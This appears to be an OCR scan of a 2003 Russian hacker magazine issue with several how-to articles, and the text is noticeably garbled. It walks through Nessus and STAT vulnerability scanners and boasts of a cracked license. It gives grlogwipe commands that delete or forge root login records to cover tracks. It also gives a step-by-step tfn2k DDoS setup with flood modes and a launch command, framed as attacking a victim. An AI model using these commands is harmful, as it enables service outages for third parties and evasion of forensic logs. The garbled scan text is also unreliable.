Главное-преглавное меню 


дополнительных модулей 
сканирования (если ты их 
додумался поставить). Включая и 
выключая интересующие тебя 
модули, можно изменить поведение 
сканера. В некоторых случаях 
можно повысить 
производительность, если не 
включать заведомо ненужные 
проверки. Выбирая модуль, ниже ты 
увидишь его способности. Их тоже 
можно по-разному комбинировать. 

Вкладка Prefs позволяет тебе 
настроить параметры проверок 
(параметров много, и с ними надо 
разбираться конкретно). Среди 
параметров есть всевозможные тайм- 
ауты, типы кодирования URL, типы и 
методы сканирования, варианты 
подбора перебором (раздел Brute 
force) и многое другое. Значения по 
умолчанию выставлены так, что в 
90% случаев их достаточно для 
первичной развебки, но ты всегда 
можешь поиграть с ними и выявить 
наиболее подходящие gna тебя. 

Вкладка Scan options поможет 
задать дополнительные опции. 
Можно выбрать методы 
сканирования портов (в том числе 
и nmap), диапазоны сканируемых 
портов, число узлов, сканируемых 
в одно и то же время. 


Не скучай! Скоро буду. Твой сканер 


Самое главное - Target selection, 
тут ты задаешь цель своей 
разведки. Если не получится за 
раз, то сессию сканирования 
можно сохранить и потом 
продолжить. Список целей также 
можно взять из файла. 

Закладка User даст тебе 
возможность настроить правила 
пользования сервером nessusd 
(более подробно об этом тебе 
расскажет документация). Для 
каждого пользователя можно 
задать свой набор правил. Это 
удобно, если сервером nessusd 
пользуется несколько человек. 
Программа-то 
многопользовательская! 

Сокращение КВ означает базу 
знаний. Пригодна она в случае 
сканирования множества узлов. 
Проще говоря, результаты 
сканирования не выбрасываются, а 
накапливаются и используются для 
дальнейшего анализа. Кроме того, 
базу удобно использовать gna 
управления процессом сканирования 
больших сетей. Можно, например, 
запретить сканирование узла, если 
недавно он уже был просканирован и 
результаты сканирования есть в 
базе знаний. 

И напоследок: три кнопки внизу - 
Start the scan (начать 
сканирование), Load report 
(загрузить отчет о сканировании), 
Quit (это тоже переводить? :)). 


START FUCKING! 

Hy вот. Долгожданный момент. 
Пиши адрес исследуемого узла во 
вкладке Terger selection и дави на 
кнопку Start the scan. Процесс 
сканирования может занимать от 
нескольких секунд до десятка минут в 
зависимости от качества и скорости 
коннекта. Во время сканирования 
выводится окно сообщений. Там нет 
ничего особо интересного кроме 
сообщений о ходе процесса 
сканирования. Чтобы не скучно было. 

Вкусности выглядят так, как 
показано на рисунке ниже. Ради 
этого стоило потратить время на 
изучение программы. Я сканировал 


Результатики 


реальный сервер своего 
провайдера, стоящий под 
операционной системой Slackware 
Linux (версию не помню). Извини, 
братан, но реальный 1Р"шник я тебе 
не дам. И не проси. 

Итак. Оконце Subnet позволит 
выбрать интересующую тебя 
просканированную подсеть (если ты 
интересовался несколькими сразу), 
Host покажет конкретный узел, Port, 
соответственно, покажет список 
портов на изучаемом компьютере, 
поле Severity расскажет о 
серьезности уязвимости сервиса на 
выбранном порте. Severity делятся 
на три вида: Security Warning - 
указывает на потенциально 
возможные уязвимости с рисками 
взлома средней (Medium) и низкой 
(Low) тяжести. Security Note - даст 
общую информацию о сервисе на 
указанном порте, версию сервиса и 
что-нибудь дополнительное. 
Security Hole - самое интересное. 
Там рассказывается, что сервис 
подвержен уязвимости, указывается 
ее тип, действие и дается 
рекомендация по ее устранению. 
Сюда попадают уязвимости со 
степенями уровней High (высокий) и 
Serious (тревожный). 

В большом оконце ниже ты 
увидишь роспись “nog Хохлому", 
где программа тебе расскажет все 
про данный разведанный сервис на 
данном уровне severity. 

На скриншоте показано, что на 
просмотренном мною узле 
уязвимость найдена в сервере http 
(порт 80). Конкретно дыра 
находится в сценарии guestbook.pl. 
Найденная уязвимость - очень 
серьезная (security hole), и 
рекомендация сканера однозначна 
- remove it from /cgi-bin (удалить!). 

Что со всем этим делать дальше - 
решать тебе. Я админ и прямо 
сейчас позвоню своему прову и 
скажу, что он - идиот и ему надо 
либо нанять меня, либо уволиться 
по собственному желанию. 
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HOWTO/CKAHEP В КАМУФЛЯЖЕ 


ОЗы 4hack 


Xander 


] Если ты 


прекрасно 
знаешь, что на 
тестируемой 
тачке стоит 
Солярка, то 
зачем тебе 
нужны две с 
лишним 
тысячи тестов 
на виндовые 
дырки? 
Берешь файл 
с конфигом 
Solaris.dat и 
спокойно 
юзаешь его. 


(net@upv.vodokanal.spb.ru, 
xander@spb300.com) 


омашней страницей 
этого танка является 
| http://premier.harris.com 
/5ТАТ. Весит монстрятина около 19 
мегов, так что запасайтесь терпением. 


ЛЕЧИМ САЛАГУ 

Теперь с вопросом о лекарстве - вещь 
в данном случае в высшей степени 
важная, потому что абсолютное боль- 
шинство серийников, предлагаемых в 
Инете, дают кривую лицензию, позво- 
ляющую проводить только один скан 
и только одной машины, что, на наш 
взгляд, является вопиющей неспра- 
ведливостью и унижением человечес- 
кого достоинства (всегда нравилась 
эта фраза :)). Поэтому нужно найти ге- 
нератор, который позволяет обрести 
нам такой серийник, который открыва- 
ет неограниченный доступ к числу ма- 
шин и к количеству сканов. У меня те- 
перь серийный номер 31337 :). Между 
делом, мне понравилось замечание, 
которое выдала прога после введения 
серийника: “У вас теперь есть армейс- 
кие привилегии” :). Типа ходить в на- 
ряд на кухню вне очереди? Ну ладно, 
разберемся с тем, что может данный 
сканер в погонах. 


ТЕХХАРАКТЕРИСТИКИ 

Системные требования - 233МГЦ, 128 
рамы, 40 метров на винте, Win 
2000/NT 4.0 с третьим сервиспаком 
либо ХР. Инсталляция и запуск требу- 
ют привилегий админа, но я-то думаю, 
ты их уже получил :). 

С какими сканируемыми осями дру- 
жит наш СТАТ? С Виндой в виде 
Windows МТ 3.51, 4.0, Windows 95, 
Windows 98, Windows 2000/ХР Pro 
and Windows Ме. С Red Hat Linux 6.2 и 
дальше, Mandrake Linux 7.0 и далее, в 
принципе со всеми пингвиноподобны- 
ми, а также Sun Solaris 7 и 8. 


ДЫРОЧКИ! 

ОК, теперь давай посмотрим, что ин- 
тересного. Очень интересен принцип 
разбиения каталога дырок. Все дыры 
разбиты по двум принципам: осевой 
принадлежности и степени значимос- 
ти. По осевой принадлежности: если 
дырка имеет обозначение, начинаю- 
щееся с |, то это пингвинья дырка, 
если $ - солярка, если W - угадай сам. 


me 
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СКАНЕР В КАМУФЛЯЖЕ 


ИССЛЕДУЕМ ВОЕННЫЙ СКАНЕР STAT SCANNER 
PROFESSIONAL EDITION ДЛЯ WINDOWS 


A еще угадай, чьих дырок там боль- 
ше :)? По степени значимости уров- 
ней выбраны high, medium, low и 
warning, что, в общем, понятно без 
перевода - высокая опасность, Cpeg- 
няя, низкая и предупреждение. 


БАТАЛЬОН! В РУЖЬЕ! 

В качестве подопытного кролика бы- 
ла задействована тачка под Windows 
ХР, стоящая в локалке без сервиспа- 
ка, но с установленным ZoneAlarm, 
так что заодно проверим, как у наше- 
го танка со скрытностью - прет ли он 
напролом или хоть мало-мало шифру- 
ется. Пора бы и приступить. 

Запуск сканера у нас идет в два этапа. 
Сначала идем в меню "Маз тез", вы- 
бираем сканируемую тачку (можно 
одну, можно из диапазона айпишни- 
ков - или по-нашему, по-бразильски - 
из сетевого окружения). При попытке 
выбрать тачку, ОСь которой STAT'y 
неизвестна, он быстро предложит 
проверить ее, что мы ему снисходи- 
тельно и позволим. Все-то ему инте- 
ресно, маленькому... 

Артподготовка завершена. Теперь 
идем в менюху “Configuration”. Там есть 
выбор: создать новую конфигурацию, 
загрузить ее из файла и прочее. Кон- 
ориг - это те проверки, которые нужно 
производить сканеру. Если ты прекрас- 
но знаешь, что на тестируемой тачке 


стоит Солярка, то на фиг тебе нужны 
две с лишним тысячи тестов на виндо- 
вые дырки? Берешь срайл с конфигом 
Solaris.dat и спокойно юзаешь его. 
Выбрали конфиг, выбрали тачки. 
Стартуем либо с помощью меню 
“Analysis”, либо кнопкой с изображе- 
нием кардиограммы - вам, любители 
черного юмора, посвящается... Ска- 


И тишина должна быть в библиотеке! 


нит, кстати, не в пример остальным 
сканерам, достаточно бодро. По мере 
того как внизу бежит красная полоска 
кардиограммы (Scanning in progress), 
в правой форточке главного окна 
программы будет расти список уязви- 
мостей или, надеюсь, не будет расти, 
если ты сканишь защищаемую тобой 
тачку. 


РЯДОВОЙ СООБЩАЕТ! 

Сообщения имеют следующие категории: 
ID - собственный идентификатор 
программы. 

Risk - степень риска дырки. 

Machine - имя машины, на которой 
найдена эта дырка (полезно, если ты 
сканишь не одну тачку - по ним мож- 
но сортировать). 

AutoFix - еще одна интересная фича. 
Если в этой колонке напротив баги 
есть “Yes”, то можно пофиксить эту 
дырку одним нажатием кнопки НА 
ВСЕХ ПРОСКАНЕННЫХ ТОБОЙ ТАЧ- 
КАХ СРАЗУ! Прикинь... 

Category - в какую категорию попада- 
ет найденная тобой дырка, например, 
права пользователя или отказ в обс- 
луживании. 

Knowledge base - база знаний фирмы 
Microsoft со статьями по данной проб- 
леме. Надеюсь, ты знаешь эту уважае- 
мую фирму - одного из ведущих про- 
изводителей программного обеспече- 
ния :)? 

Advisory - совет, предлагаемый npo- 
изводителем cocpTa, способ решения 
данной проблемы. 

CVE ID - идентификатор, присваивае- 
мый конторой под названием 
Common Vulnerabilities and Exposures. 
Bugtrag ID - объяснять нужно? OK. 
Идентификатор в баг-траке. 

Cert ID - идентификатор СЕКТ Коор- 
динативного Центра при SEI (Software 


ОВ вай ЗЫ БЫ ВЕН. 


} пинриююии 


Engineering Institute - институт разработки программного обеспе- 
чения. 

САС ID - идентификатор Центра консультирования по компью- 
терным инцидентам. 

Description - краткое описание проблемы. 


Этого вполне достаточно для получения общей информации о 
безопасности твоей машинки или машинки твоей жертвы. Но ес- 
ли недостаточно, то смело тыкай в строчку о дырке - вывалится 
окошко с несколькими вкладками, на которых будет вся инфор- 
мация по всем вышеупомянутым категориям, но не одним словом 
или строчкой, а подробная! 


ЧИНИМ И ПОДШИВАМ 

Есть у софтины еще одна интересная деталь. На вкладке General 
есть две прикольных кнопки: Autofix и Retest. Если про первую я 
уже вскользь упомянул - это возможность мгновенной починки 
одинаковых дырок на всех просканенных машинах легким движе- 
нием руки, то про вторую нужно рассказать. Очень удобная фиш- 
ка, господа гусары, очень! Нашел ты багу, подфиксил ее. И что, те- 
перь нужно заново запускать весь сканер, чтобы проверить каче- 
ство заплатки? Отнюдь! Тыкай в “Ретест". Опаньки, если ты почи- 
нил только одну фишку, зачем проверять все остальные. Эта 
кнопка проверит именно ТУ уязвимость, речь о которой идет в 
данный момент. То есть нажатием двух кнопок с интервалом в три 
секунды ты исправишь и проверишь багу. Очень удобно! Только 
АХТУНГ! Не почини случайно ту самую единственную дырку, кото- 
рая даст тебе доступ на тот так тебе необходимый порносервак... 
Хотя... Сделаешь доброе дело, может, первый раз в жизни :). 


МАСКИРОВКА ОБЪЕКТОВ 

КУСТИКАМИ 

Теперь вернемся к вопросу, поднятому в начале - о скрытности. 
Как видишь на скрине, на чекаемой тачке - тишина. В чем секрет 
такой потаенности? Может быть в том, что в папке с прогой ле- 
жит маленький экзешник с названием птар? Информация к раз- 
мышлению... 

И еще пара приятных мелочей: отправка результата сканирова- 
ния на удаленную машину в консольном режиме. Ну а иначе как 
челу на просканенной тачке слить всю инфу прямо в консоль? 
Только для этого нужно наладить коннект. И вынесенные на па- 
нель проги основные контролзы твоих Виндов (управление ком- 
пом, командная строка, панель управления, редактор реестра). 


REPORT, SOLDIER! 
Теперь о рапортах. Рапортов здесь - как собак нерезаных. OT ба- 
нальных листингов всех дырок (в нашем случае составил две 
страницы) до абсолютно монструозных Detailed Listing, который у 
меня составил, сядь-ка, братишка, покрепче, аж 12 страниц... Вот 
тебе чтиво на ночь. Распечатай и положи у прикроватного столи- 
ка или в туалете - там всегда нечего читать :). 

Итого - вещь нужная, полезная и более чем заслуживающая 
внимания. 


е- sho ИНТЕРНЕТ-МАГАЗИН 


http://www.e-shop.ru С ДОСТЯВНОЙ HA ДОМ 
БЫСТРО = Е "= ДОСТУПНО 


С Accessories 


Клавиатура/ Microsoft 
Wireless м, Desktop 
Джойстик/ 2.4GHz 
Logitech Cordless 
Controller 


Наушники/ 
Nady QH-460 


Джойстик/ Flight 
Control System Ш 
(АРС$ III) 


Заказы по интернету — круглбсуточно! 


Педали/СН Рго 
Pedals USB 


Джойстик/ cH | Flight 
_Sim Yoke USB 


e-mail: sales@e~shop.ru 
Заказы по телефону можно сделать 
с 10.00 до 21.009`с понедельника по пятницу 


.. с 10.00 до 19:00 с субботы по воскресенье 
``... СУПЕРПРЕДЛОЖЕНИЕ ДЛЯ ИНОГОРОДНИХ ПОКУПАТЕЛЕЙ: 
` стоимость доставки =] снижена на 10%! 
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НОМИТО/ИНСТРУКЦИЯ К МЕТЛЕ ДЛЯ LINUX 


ОЗы 4hack 


Дата захода 
также может 
быть замене- 
на, только 
указывать ее 
нужно через 
опции -ди -D 
в формате 
mmddhhmmss. 


Хост пользо- 
вателя заме- 
няется анало- 
гично. Только 
вместо пара- 
метров -ици -U 
используются 
“hu -Н. 


раде CET 


Дмитрий Докучаев aka Forb 
(forb@real.xakep.ru) 


так, вернемся к grlog- 

wipe. Скачиваем сей 

проект, распаковыва- 
ем известной нам командой tar zxf 
grlogwipe.tar.gz и переходим в рабо- 
чую директорию. Далее компилим 
командой gcc grlogwipe.c -o grlog- 
wipe. Клинер должен быстро соб- 
раться на любой unix-like платформе. 

Посмотрим его опции. Для этого 

запустим клинер без параметров. 
Главные его опции это -г и -w. Пер- 
вая удаляет шаблоны, взятые от 


ИНСТРУКЦИЯ 
К МЕТЛЕ ДЛЯ LINUX 


ЛОГВАЙПЕРЫ HOWTO 


Был рут, и тут его не стало 


На самом деле опция замены поль- 
зователя иногда может быть полез- 
ной. Все зависит от исходной ситуа- 
ЦИИ. 


Хост пользователя заменяется 
аналогично. Только вместо пара- 


Девелоперы знают, что делают, 
поэтому урезать их творения по личному 
желанию, как минимум, некрасиво. 


других параметров, из бинарных 
файлов. Опция записи позволяет 
модифицировать бинарные файлы, 
заменяя в них имя пользователя, 
хост, дату захода в систему и т.п. 


ПОДСТАВА - ДЕЛО 
БЛАГОРОДНОЕ 

Перейдем к практике. Попробуем 
сменить имя пользователя root на 
lamer ;). В этом нам помогут опции - 
ци -0. Первая принимает шаблон- 
ное имя, вторая - имя, на которое 
заменяем. В довершение следует 
сказать клинеру, что мы работаем с 
бинарниками в режиме изменения 
данных. Вся командная строка за- 
пишется следующим образом: 


./grlogwipe -и root -U lamer -w 


Выполнив last lamer, мы убедимся 
в правильной работе логвайпера. 


Превращаем суперпользователя в ламера 


Ека 


— 
GSS 0732) 2003 


метров -U и -Ц используются -h и - 
Н. Команда: 


./grlogwipe -и root -U lamer -h 127.0.01 -Н 
192.192.1921 -w 


заменит логин root и хост 127.0.0.1 
на другие значения в случае совпа- 
дения заданного шаблона. Дата за- 
хода также может быть заменена, 
только указывать ее нужно через 
опции -d и -D в формате mmddhh- 
mmss. 


ПРЯМАЯ ЗАДАЧА - УБИРАЕМ 
ЗА СОБОЙ 

“Зачем эти извращения?” - спро- 
сишь ты и потребуешь от меня син- 
таксиса, ориентированного на пол- 
ное удаление шабпонной записи. 
Это также возможно и делается пу- 
тем опускания заглавных опций и 90- 


бавления параметра -w. Таким обра- 
зом, строка: 


./grlogwipe -и root -Н 127.0.0.1 -w -г 


уберет из бинарных логов все захо- 
ды рута с локального IP. 


Шаблон можно задавать как по 
логину, ip-agpecy, так и по дате. 
Еще раз повторюсь, что указывает- 
ся она в формате mmddhhmmss. 


И ЭТО ВСЕ?! 

Это все, на что способен grlogwipe. 
Не питай надежды, я не буду распи- 
сывать тебе работу всех клинеров, 
о которых было рассказано в 0630- 
ре. Ты прекрасно разберешься сам, 
прочитав исчерпывающий README 
к каждому из них либо просмот- 
ришь SOUrce-KOg при отсутствии ма- 
нуала. Этот мини HOWTO лишь тол- 
чок (не путать с жаргонным значе- 
нием этого слова ;)) к прочтению ма- 
нуала по интересующей тебя теме. 


Е редакционная 
И Е" ПОДПИСКА! 


Вы можете оформить редакционную подписку на любой российский адрес 


1. Заполнить подписной купон 


и Прошу оформить подписку на журнал "ХакерСпец" 


На 6 месяцев (начиная с 2003 г.) 
С На 12 месяцев (начиная с 2003 г.) 


(отметьте квадрат, выбранного варианта подписки) 


2. Заполнить квитанцию (или 
ксерокопию). Стоимость 
подписки заполняется из расчета: 
6 месяцев - 600 рублей 


12 месяцев - 1200 рублей Ф.И.О. 
Город/село ул. 
(В стоимость подписки включена доставка 
ie Дом корп. KB. Ten. 
заказной бандеролью.) 
Сумма оплаты 
3) Перечислить СТОИМОСТЬ Подпись Дата е-тай: 


подписки через Сбербанк. K 
опия платежного поручения прилагается. 


4. Обязательно прислать в 


редакцию копию оплаченной >t и 
квитанции с четко заполненным ИНН ___ 7729410015 ООО"ТеймЛанд 
купоном Извещение ЗАО «Международный Московский Банк», г. Москва 
Ио электронной почте р/с №40702810700010298407 
subsoribe xo@ gamelana 1a к/с №30101810300000000545 
или по факсу 924-9694 
(с пометкой "редакционная БИК 044525545 КПП - 772901001 
подписка"). Плательщик 
или по адресу: Адрес (с индексом) 
103031, Москва, Дмитровский 
переулок, д 4, строение 2, Назначение платежа ИИ 
ООО "Гейм Лэнд" (с пометкой Оплата журнала "ХакерСпец" 
Редакционная подписка"). ae 200.6 
Рекомендуем использовать 
электронную почту или факс. Кассир Подпись плательщика 


ИНН 7729410015 ООО"ГеймЛэнд" 


ВНИМАНИЕ! 


ЗАО «Международный Московский Банк», г. Москва 


Подписка производится с 
номера, выходящего через 
один календарный месяц 
после оплаты. Например, 
если вы производите оплату в 
Сентябре, то подписку можете 


р/с №40702810700010298407 
к/с №30101810300000000545 
БИК 044525545 КПП - 772901001 


Плательщик 


оформить с Декабря. К 


СПРАВКИ Назначение платежа Сумма 
по электронной почте Оплата журнала "ХакерСпец" 
я за 200_г. 
subscribe_xs@gameland.ru = 
или по тел. (095)292-3908, Квитанция 
292-5463 Z Подпись плательщика 
ассир 


Подписка для юридических лиц 


Юридическим лицам для оформления подписки необходимо прислать заявку на получение счета для оплаты по адресу 
й "редакционная подписка"). В заявке указать полные банковские 


subscribe_xs@gameland.ru или по факсу 924-9694 (с пометкой 
реквизиты и адрес получателя. Подписка оформляется на 12 месяцев, начиная с месяца, следующего после оплаты. 


HOWTO/Y KOs] СМЕРТИ С ШЕЛЛА 


ОЗы 4hack 


ФБР заявило, 
что осенний 
DDoS - самая 
крупная гло- 
бальная атака 
за всю исто- 
рию сущест- 
вования Ин- 
тернета. 


Докучаев Дмитрий aka Forb 
(forb@real.xakep.ru) 


о 21 октября 2002 ro- 

да был произведен 

масштабный 0005, 
направленный на слабое место 
всемирной паутины - DNS серве- 
ра. Были атакованы 13 корневых 
серверов имен, в основном нахо- 
дящихся в Штатах. Атака повлек- 
ла за собой много потерь, но 
пользователи мало ощутили на 
себе задержку связи. Тем не ме- 
нее ФБР заявило, что осенний 
DDoS - самая крупная глобальная 
атака за всю историю существо- 
вания Интернета. То ли еще бу- 
дет... 


Совсем недавно была обнаруже- 
на брешь в правильной оси, а 
именно в ядре 2.4.х. Через дырку 
в ядре можно убить Linux кривы- 
ми пакетами, после посылки кото- 
рых процессор на тачке загружа- 
ется на все 100%, а сервер уходит 
в даун. DoS-ep еще не вышел, HO, 
судя по открытому объяснению 
баги, публичный его релиз не за 
горами. Так что советую админам 
обновить ядро до самой послед- 
ней версии, чтобы потом не было 
мучительно больно... 


ОТ ТЕОРИИ К ПРАКТИКЕ 

Как я уже говорил, DoS-ataku 
подразделяются на несколько ти- 
пов. Но, несмотря Ha тип ДоСа, 
для атакующего очень важны 
несколько факторов: 


1. Канал. По определению твой 
канал должен быть намного шире 
канала сервера-жертвы, поэтому, 
если ты сидишь на диалапе горо- 
да-героя Мухосранска, ничего хо- 
рошего из атаки не выйдет :). 

2. Траффик. Учитывай тот Cpak- 
тор, что весь траффик, который 
ты нагонишь удаленному серверу, 
может учитываться твоим провай- 
дером, так что у тебя есть реаль- 
ный шанс наступить на твои же 
собственные грабли (читай: “no- 
пасть на огромные бабки"). 

3. Безопасность. В последнее 
время Во5-атаками занимается 


И 
Lie | 07(32) 2003 


om fee pee oe Beg ee of eee 


ee 
SS Виши 
ae je les 


Список уязвимых версий Linux... 


абизе-служба атакованных компа- 
ний. Иными словами, если тебя 
засекут, тебе будет не сладко, по- 
этому, если уж идешь на грязное 
дело, иди с умом. 


Будем считать, что все факторы 
были благополучно учтены. Ты 
же всегда мечтал почувствовать 
себя злым хакером, произвосдя- 
щим DoS-ataky? Тогда следи за 
моими действиями: сейчас мы со- 
вершим глобальный DDOS. 


ИЗУЧАЕМ ПУЛЕМЕТ 

Для задумки используем tfn2k, 
описанный в обзоре DDoS-epoB 
под Линь. Установим два серве- 
ра-демона на различные машины. 
После этого приступим к изуче- 
нию клиента. Поговорим о каждом 
его параметре, чтобы не возника- 
ло лишних вопросов. 


УКОЛ СМЕРТИ С ШЕЛЛА 


DOS АТАКИ В ПРАВИЛЬНОЙ ОСИ 


Если запустить {Ёп без парамет- 
ров, то ты получишь огромный 
help по его использованию. 

Первый параметр -Р. Указывает 
на протокол флуда. Может иметь 
одно из трех значений: TCP, UDP 
и ICMP. 

Опция -S позволяет заспуфофить 
(заменить) твой реальный !р-ад- 
рес. Применим только в случае 
UDP-npotokona. 

Параметр -f указывает на файл, 
в котором хранятся ip-agpeca 3a- 
зомбированных тачек. Это файло 
должно быть предварительно 
составлено и проверено. 

Если демон установлен лишь на 
один сервер, используй параметр 
-h вместо -f, передав ему ip-agpec 
зомбированной тачки. 

Опция -i указывает на сервер, 
который мы будем флудить. Ду- 
маю, указать ее значение для те- 
бя - не проблема. 

Для указания порта (при SYN- 
флуде) указывай значение пара- 
метра -р (порт для соединения). 


Наконец мы добрались go типов 
DoS-atak. Рассмотрим самые nony- 
лярные из них: 


1. Флуд УОР-пакетами. Завалива- 
ет сервер UDP-mycopomM, так что, 
если фаерволл на тачке не про- 
пускает ЦОР, сервер благополуч- 
но загнется. Для выбора этого ти- 
па установи значение опции -с 
равным 4. 

2. TCP/SYN флуд. Механизм 
флуда, я думаю, понятен - созда- 
ние многочисленных соединений 
на определенный порт с целью 
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останова определенного сервиса. 
Значение этого типа равно 5. 

3. ICMP флуд. Используя обыч- 
ный ECHO REQUEST, tfn2k укла- 
дывает жертву на лопатки. Если 
хочешь испытать этот тип, уста- 
нови значение параметра -с рав- 
ным 6. 

4. МХ флуд. Интеграция всех 
протоколов (ICMP, UDP и ТСР в 
одном флаконе). После такого ас- 
сорти от сервера остается мокрое 
место ;). Тип флуда равен 8. 


Помимо параметров флуда су- 
ществуют полезные опции -c, 
позволяющие сделать следую- 
щие действия: 


1. Остановить любой флуд на ip- 
адрес. Значение параметра выста- 
вить равным 0. 

2. Установить иной размер паке- 
та. Для этого нужно изменить 
значение -1 (размер в байтах), а 
значение параметра -с поставить 
равным 3. 

3. Выполнить команду на всех 
зазомбированных серверах. Зна- 
чение -с равно 10, значение -1 - 
нужной команде. 


Вот, собственно, и все возмож- 
ности флудера :). Осталось про- 
верить их в действии. Конечно, 
два сервера для DDOS очень мало 
(обычно число серверов состав- 
ляет от нескольких десятков gO 
нескольких тысяч!), но за неиме- 
нием большего ограничимся этим. 
Для начала установим и запустим 
демон на серверах 
serverl.flood.net и 
server2.flood.net (все имена вы- 
мышлены, совпадение считать 
чистой случайностью ;)). 


МУТИМ 000$ 

Итак, распакуем архив tfn2k.tgz 
(командой tar zxf tfn2k.tgz), затем 
перейдем в папку tfn2k/src и на- 
пишем команду таке. В моем слу- 
чае компилятор ругнулся на пере- 
определенную структуру in_addr 
в хеадере ip.h. После небольших 
надругательств над этим файлом 
(в виде комментария Hifndef 


НОМИТО/УКОЛ СМЕРТИ С ШЕПЛА 


конструкции) DDoS-ep испекся 
нормально (хоть и с кучей магп- 
ing'oB). 


Следующим шагом был запуск 
сервера-демона. Это бинарник td 
в папке src/. После запуска он не 
выдаст никаких слов, а молча 
упадет в бэкграунод. Ту же опера- 
цию проделываем и со вторым 
сервером. 


После истязаний с сервером пе- 
рейдем к клиенту. Создадим файл 
hosts, в котором будет находить- 
ся список зазомбированных сер- 
веров (в нашем случае файл бу- 
дет содержать две записи). 


Настало самое интересное. Поп- 
робуем отОВоЗить кого-нибудь по 
самые помидоры. Для нагляднос- 
ти была выбрана тачка со слабым 
каналом. Меряем пинг до нее - 82 
миллисекунды. Довольно слабый 
пинг, не так ли ;)? Теперь запус- 
тим клиент tfn2k. Командуем: 


/tin2k -Р ТСР -f ./hosts -i server3.flood.net - 
c4 


и наслаждаемся процессом UDP- 
флуда сервера. 

Замеряем пинг в процессе флу- 
да. И что мы видим? Среднее вре- 
мя ответа увеличилось почти в 
два раза и составило 153 милли- 


Проводим замеры: 
ping go и во время атаки 


секунды. Эффект неплохой. А что 
если взять не два, а двадцать или 
даже двести зазомбированных 
серверов? Судя по тестированию, 
от сервера не останется даже 
мокрого места. 


Пощадим сервер и прекратим 
флуд командой ./tfn2k -Р TCP -f 
./hosts -i server3.flood.net -с 0. 
После всего этого считаем экспе- 
римент успешным. Мы доказали, 
что DDOS может нанести реаль- 
ный урон серверу и его сервисам. 
Более того, DDoS подразумевает 
реальную утечку траффика, а за 
него кто-то все равно расплачи- 
вается... 


А ЕСТЬ ЛИ ЗАЩИТА? 

Этот вопрос покажется тебе нем- 
ного странным. Ведь фаерволлы 
еще никто не отменял. Казалось 
бы, установи запрет на UDP, ICMP 


и открой ТСР только доверенным 
хостам (мне ли тебя учить пра- 
вильной настройке фаерволла?). 
Но не все так просто, как кажет- 
ся... Если твоей машиной серьез- 
но заинтересуются, то никакой 
фаерволл тебе не поможет. Ведь 
пакеты все равно приходят в сис- 
тему, а файр лишь фильтрует их. 
С десятками и сотнями пакетов 
он, допустим, справится. А что ес- 
ли атака будет производиться с 
тысячи машин? Сервер просто не 
выдержит, а пропускная способ- 
ность упадет до нулевой отметки. 
Единственное спасение - пропи- 
сывать настройку фаерволла не 
на самой машине, а на роутере, 
который стоит на ступень выше. 
Но опять же при атаке роутеру 
вряд ли повезет ;). 


А от небольших атак фаерволл - 
единственное средство защиты. 
Мало кто знает, что он может пи- 
сать в логи все обращения к сер- 
веру. Сейчас я расскажу - как. 
Объясняю на примере ipfw (фай- 
ра для FreeBSD). Создаем запись, 
которая обрабатывает весь вхо- 
дящий траффик. Помимо этого, 


Защищаемся от нежданных гостей 


используем параметр log, а при 
желании и logamount, значение 
которого будет равно максимуму 
записей в [09-файле. Таким обра- 
зом, запись будет выглядеть так: 


ipfw add 50000 log logamount 1000000 
allow ip from any to me 


Далее смотри /var/log/secure 
(туда будет скидываться инфа о 
входящих пакетах). А еще лучше 
- перенастрой syslogd, чтобы 3a- 
писи от фаерволла писались в 
отдельный лог. Но его настройка - 
это совсем другая история... 


Вот, собственно, и все. Пора де- 
лать выводы. После прочтения 
материала для кого-то DDOS oc- 
тался загадкой и мифическим яв- 
лением, кто-то понял всю глубину 
таких атак и поспешил защищать 
свой сервер, а кто-то забил на 
все проблемы и свалил пить пи- 
во. А хакер не дремлет, он пишет 
заветную строчку клиенту tfn, ко- 
торую с радостью готовы испол- 
нить тысячи демонов DDOS-epa... 
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Два-три 
сервера-зомби 
для DDoS 
очень мало - 
обычно число 
серверов 
составляет от 
нескольких 
десятков go 
нескольких 
тысяч! 


DDoS может 
нанести ре- 
альный урон 
серверу и его 
сервисам. 
Более того, 
DDoS подразу- 
мевает реаль- 
ную утечку 
траффика, а 
за него кто-то 
все равно 
расплачива- 
ется... 
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ПОТРЯСЛИ, ПОТОМ 


00$-АТАКИ ПОД ВЫНЬ. 


.РОт@п АКА DOceNT:. 


Время нюке- 
ров уже про- 
ходит вместе 
с эрой 95-х и 
98-х Виндов. 


Речь пойдет о прогах для DoS-aTak на виндовые машины, больше известных как 


нюкеры. Напомню тебе, что это вид атак вызывает нестабильную работу атакуемой 
машины - она может зависнуть, сглючить, и, как правило, всегда теряет связь. 


аправлены нюкеры на 

программные глюки в 

оси и серверном соф- 
те, или на перегрузку портов. Длит- 
ся атака в зависимости от способа 
и используемых средств, либо до 
перезагрузки системы, либо опре- 
деленный промежуток времени, на 
который необходимо изолировать 
жертву от общества. 

Народ юзает нюкеры по разным 
причинам: кому-то надоел долбанный 
урод в асе или ирке, и надо срочно 
его выкинуть оттуда, чтобы неповад- 
но было, ау кого-то намерения по- 
серьезней, например, админа изоли- 
ровать, чтобы воспользоваться толь- 
ко что перехваченными логом и пас- 
сом на рут к удаленному серваку. 

Защититься от нюкеров довольно 
легко при помощи хорошего и пра- 
вильно настроенного фаервола, а 
также если вовремя ставить све- 
жие обновления, заплатки и сервис 
паки на ось, а лучше юзать все 
средства сразу. 

К сожалению, а может и к счастью, 
время нюкеров уже проходит вместе 
с эрой 95-х и 98-х Виндов. Давно уже 
не появлялись столь вопиющие ды- 
ры, чтобы можно было написать гуе- 
вые эксплоиты убивающие врага Og- 
ним кликом. Завалить МТ-евую тачку 
с помощью столь примитивных 
инструментов практически невоз- 
можно. Серьезная DoS атака требует 
тщательной подготовки, толстых ка- 
налов, никсового шелла и прочих 
прелестей. 

Но чтобы ты не кричал, что это все 
лажа, и не стоило вообще этим место 
в журнале занимать, я тебе скажу, что, 
во-первых, осталось еще много наро- 
да, с удовольствием юзающего 9х и 
ни в какую не признающего 2000 и 
ХР, во-вторых, и МТ-евые машины име- 
ют свои бреши (не перевелись еще у 
Гейтса баги!), и при некотором усер- 
дии можно уронить и их. Так что вни- 
кай - наверняка, пригодится. 


ПОЛЦАРСТВА 3A IP 

Не устану повторять: чтобы заю- 
зать даже самую тупую тулзу с ог- 
ромной красной кнопкой «KILL 
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THAT BUSTARD!!!», нужно хотя бы 
немного шарить в сетевых протоко- 
лах, а для этого надо не лениться и 
хотя бы минимально читать г!с'шки 
и другие доки, на которые СПЕЦ ре- 
гулярно дает линки (а с недавних 
пор и выкладывает на диск). Поэто- 
